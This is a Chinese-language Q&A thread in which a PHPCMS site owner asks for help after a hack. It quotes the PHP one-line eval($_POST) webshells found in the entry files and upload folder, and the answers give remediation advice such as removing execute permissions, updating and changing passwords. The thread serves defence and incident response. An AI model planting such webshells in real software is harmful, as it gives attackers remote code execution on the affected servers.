网站程序遭木马【<?php eval($_POST[1]);?> ok】入侵，请求帮助探寻机理？

Question

网站近来频繁遭遇黑客攻击，请求PHP大神给予协助，厘清思路，以助早日找到漏洞，解决烦忧！

现将事件经过陈述如下：

1、网站采用PHPCMS_V9_5.20默认版本搭建。

2、所有文件起先均以全开放权限存于服务器根目录。

3、后来网站被黑，入口文件api.php和index.php被改写。

4、植入病毒文件为：“一句话木马”。内容如下：

<?php @eval($_POST['dcs-19']);?>
<?php

5、发现问题，删除以后，将此类文件的权限锁死，以为就能解决问题。可是隔几日，发现网站的快照被劫持，遂又查杀了一次木马，结果显示，木马文件所在位置为服务器根目录下uploadfile20170527文件夹中，此文件为后台上传附件或更新文章时按照日期自动生成。但是5月27日这天并没有更新文章，却出现了，请求大神给予协助，排查网站问题根源所在。

木马内容为：

<?php eval($_POST[1]);?>
ok

另附：在网上查询了相关内容，大多数说是网站程序漏洞所致的sql注入攻击，提示修复漏洞，但是怎么修复啊？PHP版本在线升级会有用吗？

【本人小白非技术出生，很多东西都不懂，说的不明白的地方，问答中，我再按照你们的指示补充！】

Answer 1

这句话代码原理很简单，POST指的是客户端传送过去的数据，eval表示将这些数据当成代码执行。
对于黑客来说就是只需要在你网页上的对话框输入代码，提交以后就会被实际执行。

这只是表征，也就是最后留下的后门，但是黑客如何进来留后门的，那可能性就太多了，说不定上传功能有漏洞，ftp密码被破，管理员权限被获取，等等。最后留下这句木马只是下次使用方便而已。

最起码的需要做的，是整套代码下载下来，遍历一遍所有代码，查到所有 eval 相关的地方，如非本身程序必须，全部处理掉，不然你这边删一个，人家在别的地方重新上传一个，没完没了了。第二就是堵住系统管理漏洞，服务器各项组件能更新的就更新，所有密码全都改掉使用随机强密码，然后在服务器装个杀毒软件，我记得以前用过 Linux 服务器一个开源的。。忘了名字你搜索下就好。

最后，实在不行就交给专业的人处理，看投资值不值得了，我记得外国有网站是提供木马查杀，变动监控服务的，好像一两百美金一年，挺贵。国内不知道有没有相同的服务。

Answer 2

关于PHPCMS漏洞的通知
尊敬的用户：
您好！
今年四月份PHPCMS程序被曝出的最新漏洞，可以通过修改会员注册参数向网站注入PHP木马文件。通过我司测试发现，注册会员时，PHPCMS会将注册信息进行加密，然后再传递到服务器上进行会员注册操作，由于加密方式暂时无法破解，因此我司无法通过匹配对应的关键词来拦截黑客入侵；
目前解决方案有三种：

1. 升级到最新的PHPCMS程序；

2. 关闭网站上的会员注册功能；

3. 取消uploadfile目录的执行权限（此方法可以避免木马执行，但无法避免木马文件上传）；
   执行上述任一方案后，请彻底检查uploadfile目录及子目录，是否含有PHP文件，此目录为上传图片的图片保存目录，如果发现存在PHP文件，则一定为木马文件！请及时删除！

景安网络
2017.6.19

Answer 3

换服务器密码，换SSH默认端口，能换服务器换个服务器。换PHPCMS，5,6年前都停止更新了。肯定漏洞不少。

Answer 4

权限问题，你的上传目录开了可执行权限。
解决问题的方法么，排除PHPCMS的漏洞之外，你需要将所以外部文件（不是你自己写的或者框架的代码）目录的可执行权限去掉。

chmod -R 644 upload

Answer 5

楼上两位回复：你的上传目录开了可执行权限、取消uploadfile目录的执行权限
这是什么意思？都取消目录执行权限了，目录都打不开，自己要上传图片都上传不了，那还行？